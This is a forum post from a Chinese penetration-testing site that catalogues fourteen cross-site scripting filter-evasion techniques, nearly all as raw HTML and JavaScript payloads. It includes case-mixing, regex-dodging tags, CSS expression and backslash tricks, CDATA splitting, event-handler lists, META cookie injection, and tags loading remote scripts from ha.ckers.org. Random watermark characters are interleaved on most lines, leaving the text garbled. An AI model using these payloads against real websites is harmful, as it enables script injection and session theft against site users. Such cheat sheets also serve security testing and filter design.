中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
' J1 t) b, z! z& h0 m2 ~0 Y5 y; ^3 R& Z4 U4 M, ^' c6 p6 h
& d- `( g2 |- h' |1 @. q5 E0 ]

( k  p4 }1 ]4 _( `* s- d    <sCript>alert(‘d’)</scRipT>& A+ \2 ^; j( c$ |% n

2 r+ e. U4 U; z: N/ j, u8 v9 ?2. 利用多加一些其它字符来规避Regular Expression的检查
0 F6 q, q1 O0 h& y7 N3 Y5 g; Q% F7 E2 ^/ h8 N
    <<script>alert(‘c’)//<</script>
  f1 s. p  X. \4 t3 {% u1 V' Z& c  h6 ?  A( J  n* }3 `, K
    <SCRIPT a=">" SRC="t.js"></SCRIPT>
. L  |5 c+ S  `+ c0 g( v0 c
( `3 `2 P- n9 M    <SCRIPT =">" SRC="t.js"></SCRIPT>
4 @2 W# j$ A- d/ h$ e" R9 @3 p0 L6 L: A! x, G- N
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>7 ~- m0 k& w$ O  L4 p
, U1 b! Y$ W* \
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>( j' e1 I; W$ s- f  p7 f. y9 [# o9 r

/ M( z. k2 U9 P- U) }    <SCRIPT a=`>` SRC="t.js"></SCRIPT>  F8 c- c5 u6 Y) p$ ]& M; Y- c
8 c: w! g7 w4 G* A& U
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>. n7 B- r! Q' a* k. p
1 t0 `; Q9 V! h/ }+ ^
3. 以其它扩展名取代.js$ A  d# M' a2 I) j: ?9 i
$ X7 `8 ~: ]9 C
    <script src="bad.jpg"></script>
* ]% \* H( z" P  x) N
/ Y- s" l1 Y" [: v# g4. 将Javascript写在CSS档里9 a* _$ y0 |: i; M& i) }! E
. w, H1 R3 O: X0 i& \, v
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
( l& ]% R" O/ n& U, d7 h! ?3 J3 y, i& o  X; \; b5 ?
       example:
9 H- s  ~# D% c# s+ Y* z- S7 e7 ~  G1 @4 T( }
          body {
* S5 u$ @( a; n, h% `% K" S4 l; B7 s/ K. Y4 i
               background-image: url(‘javascript:alert("XSS");’)
* F$ {* K+ p7 Q/ n  t
  j& x8 Q7 g1 J& v4 W          }% C& o8 v# n, w

7 q; T% \, G# B9 P0 ~5. 在script的tag里加入一些其它字符. x2 N! K  B% j& P

; |& p/ O% ?' Q/ i1 U    <SCRIPT/SRC="t.js"></SCRIPT>
- _9 m9 Q% j9 X( h
+ G4 k4 D: y3 R7 J3 {2 c/ ^) ?    <SCRIPT/anyword SRC="t.js"></SCRIPT>
3 G- N0 j# ^3 v2 I3 ]5 y# ]2 a' r3 ~: T2 w8 E7 N
6. 使用tab或是new line来规避. R9 z6 S6 E. t, k
+ H4 d  N( B+ |) r( U9 {& S  \& {
    <img src="jav ascr ipt:alert(‘XSS3′)">
9 Z- h+ k. g# A% }6 v6 K" o. a# \3 H3 s6 w1 s4 ]& c+ L% e: d
    <img src="jav ascr ipt:alert(‘XSS3′)">
6 G8 E; L0 j1 I) L/ C& e0 Z
8 G+ V$ g% i, Y" J- I$ p    <IMG SRC="jav ascript:alert(‘XSS’);">0 Y. Z# q% x+ H, a5 B+ p
$ p) j( F2 n/ t9 f
         -> tag
$ y# L  f. m: M) F" w* }$ t5 S0 q/ f! V3 o
         -> new line- p" M$ N3 o) Y0 ~% u+ X% o" d

. N1 L' z2 h& U% @7. 使用"\"来规避9 ~$ P2 g' w: V

( s4 T! c6 x% B1 K; s    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>4 [" g; C. X+ ]5 o; F

$ ]: x- c0 A. j7 ], E" Z) ^+ F# |    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
, }2 O& V. Z3 ]
' x+ Z: B" O! R$ n& Z    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">& x0 h( w5 K4 W$ ^6 i

* r& b- p0 R! a8 C  ~- F- y    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">- r" a2 t) H4 K* R! M

+ P3 D) U1 q, k- i- _/ o0 E/ m    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>  G6 C" P$ Y0 {6 U' j2 U, d2 f( T
. U0 U! w* S/ ]: P  L
8. 使用Hex encode来规避(也可能会把";"拿掉)0 T( F9 t' @) Q1 y
8 }' q7 M2 [( Q( ^& Y4 y
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
" ^# b2 @2 F/ |" d- Q
5 ~) W" K( [7 J        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 t' H1 s5 M6 Z- F2 a- B! I- S+ p6 c
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">) }7 ?9 ?$ p  |' h

& r0 c( y0 _* D( E        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 |" Y& o4 @( q# q8 c0 \  j  D; H

! a( T& s2 v+ F) m/ ]" W* S& E9. script in HTML tag
4 A, _$ P' m1 D
/ |5 P/ I% S9 ?& K! L. a% E    <body onload=」alert(‘onload’)」>& v6 b& I: a# ]6 k- A6 _% Z

0 W# X6 w) f0 v) l/ J4 ~- v        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
/ C; E" R2 ?& w3 x# x$ t' y0 e, t8 C
  q4 H$ l1 H5 Z10. 在swf里含有xss的code1 N5 o9 c5 w/ u4 d7 B) M

$ ^3 `, c* G; k; Z9 X& b+ K- i9 H    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
/ E3 z* B7 N4 D# d- z5 y! P7 O5 V% A& z# U
11. 利用CDATA将xss的code拆开,再组合起来。9 W% j$ ^, `$ S8 V" d

  Q2 [" z" G, X8 D" U" c) P6 j    <XML ID=I><X><C>
  ^( x; B5 [" S6 C# c
! f- K" @1 d. p0 ]) b: t    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>5 Y+ W) i/ o+ \: _% ?
7 v) c! W: B2 @. x! `8 n& i: Q. S  R
    </C></X>/ N; ?; t2 ~: O2 d" U! T
0 w6 k' X9 _! x6 e2 @; v$ q
    </xml>
2 L0 Z5 z* \' R* J! v* t0 ?+ W  K9 }0 `. T
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
# b) ?' t, |$ |/ L1 D  D  v) {- V$ z, |, P
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>, t8 E3 B) p  |) c9 m

. ~  r: `/ k- \& _    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
1 a- r$ n' ?. g  ]3 ]. v) d& _% L% e! w. D
12. 利用HTML+TIME。- ~/ Z, @# o. `  q# g1 S6 O
* g# H+ _# u/ ]; F3 c3 u
    <HTML><BODY>
7 ^3 g, W" x5 C" P- y( e  y- E
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">/ N7 x0 o- z+ ~5 m
7 E2 Y9 `& S. ?9 ?
    <?import namespace="t" implementation="#default#time2">: Y# S) N3 a! s* e
+ z) n# W* h6 O2 ?
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
3 |. ?$ N* p' ?5 e( g$ g
/ E7 F' g8 [8 k4 W' |    </BODY></HTML>
3 i% J% f  a1 i- L4 V' Q/ L5 @7 K! v9 V. ]1 K
13. 透过META写入Cookie。
1 J; f+ h- Y( u- R9 X( o4 b& s
: V, K( x2 s# x% `+ F* z* t7 ^    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
) ]3 b; V5 b% U' ?  V
8 v4 F" W+ Z6 U2 S8 T# ]4 i4 f14. javascript in src , href , url- A$ P) I# \0 @' ^7 C

6 [' P$ |6 S( u' @1 P    <IFRAME SRC=javascript:alert(’13′)></IFRAME>' R% S/ F2 D- d2 j  a) V7 o+ X

2 N" E5 ~% c0 I) c" J2 d! n; @    <img src="javascript:alert(‘XSS3′)">+ j" y. M6 Q# O4 e* r; W
7 v  u5 b% u& m: ]; \3 d
<IMG DYNSRC="javascript:alert(‘XSS20′)">
: h7 q5 G$ [% v  a% W( t- n: C; T  v- z1 ~4 l0 l' J
    <IMG LOWSRC="javascript:alert(‘XSS21′)">5 |$ W- G1 k  @" ?1 P) o1 c
6 D  X/ q% ]2 r7 @) u
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
) h; c% l$ ^" D( h
" B! z$ d7 j) T" U# j    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>4 b( `4 n3 h7 P7 W: [

  T# j4 y# `3 Y0 Z5 z% w% ^3 ]0 m    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
8 r4 z9 Q+ ]' N. m- r0 R% X* N0 M$ ^* {8 r$ r7 K
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
2 Y; I5 Q8 n; H. z1 a) t/ Z5 L
! H; z. o# t# H    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
1 m- r: N/ `+ x2 H7 @: {- T0 {" z" L& _- ]. L4 s6 b6 h
    </STYLE><A CLASS=XSS></A>, W. A  I& n8 M6 z; b
; j8 @1 a- n& N! q
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>5 t8 t& G$ `& n( i% O

( x, K6 N0 ]$ d9 y3 C" b* p1 I% i: t



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2